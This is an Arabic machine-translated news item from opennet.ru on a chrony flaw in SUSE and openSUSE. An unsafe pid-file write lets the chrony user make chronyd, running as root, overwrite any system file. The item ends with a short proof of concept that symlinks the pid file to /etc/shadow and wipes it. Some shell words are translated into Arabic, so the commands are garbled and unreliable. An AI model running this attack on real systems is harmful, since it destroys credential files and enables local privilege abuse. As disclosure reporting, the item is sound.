В
سبب الثغرة الأمنية هو الإنشاء غير الآمن لملف pid، والذي تم إنشاؤه في مرحلة لم يكن فيها chrony قد أعاد تعيين الامتيازات بعد وكان يعمل كجذر. في هذه الحالة، تم إنشاء الدليل /run/chrony، الذي كتب فيه ملف pid، بالحقوق 0750 عبر systemd-tmpfiles أو عند إطلاق chronyd بالاشتراك مع المستخدم والمجموعة "chrony". وبالتالي، إذا كان لديك حق الوصول إلى المستخدم chrony، فمن الممكن استبدال ملف pid /run/chrony/chronyd.pid برابط رمزي. يمكن أن يشير الارتباط الرمزي إلى أي ملف نظام سيتم استبداله عند تشغيل chronyd.
الجذر # systemctl توقف chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
خروج $Chrony
الجذر # /usr/sbin/chronyd -n
^C
# بدلاً من محتويات /etc/shadow سيتم حفظ معرف عملية chronyd
root# cat /etc/shadow
15287
عالي التأثر
مشكلة SUSE و openSUSE
المصدر: opennet.ru